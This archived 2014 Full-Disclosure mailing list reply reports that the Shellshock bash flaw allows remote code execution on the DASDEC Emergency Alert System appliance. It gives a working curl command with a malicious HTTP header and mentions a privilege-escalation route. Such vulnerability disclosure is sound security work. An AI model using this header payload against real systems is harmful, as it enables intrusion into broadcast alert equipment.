lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 26 Sep 2014 14:02:51 -0400
From: Matt Hazinski <mhazinsk@...edu>
To: <fulldisclosure@...lists.org>
Subject: Re: [FD] Critical bash vulnerability CVE-2014-6271

On Thu, Sep 25, 2014 at 02:39:55PM +0200, Philip Cheong wrote:
> Worse that heartbleed?
>
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
>
> http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
>

I'm able to get remote code execution via CVE-2014-6271 on the Digital 
Alert Systems DASDEC. This appliance is used by broadcasters to send and
receive Emergency Alert System messages over IP and AFSK. Once 
authenticated, 
an attacker can interrupt broadcasts (via a relay) and play arbitrary audio 
over the airwaves.

Exploiting it only requires a malicious HTTP header:

curl -H 'X-Shell-Shock: () { :; }; /bin/echo vulnerable  > 
/tmp/dumped_file'
http://192.168.0.45/dasdec/dasdec.csp

[matt@...T-EAS ~]# cat /tmp/dumped_file 
vulnerable

Commands are executed as the apache user, but privilege escalation can 
still
be obtained through CVE-2009-2692 despite the vendor's recent cumulative 
security patch.

I suspect all versions of the DASDEC are vulnerable to this, although I 
only have a DASDEC-1EN running software version 2.0-2 to test.

-- 
Matt Hazinski
mhazinsk@...edu

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists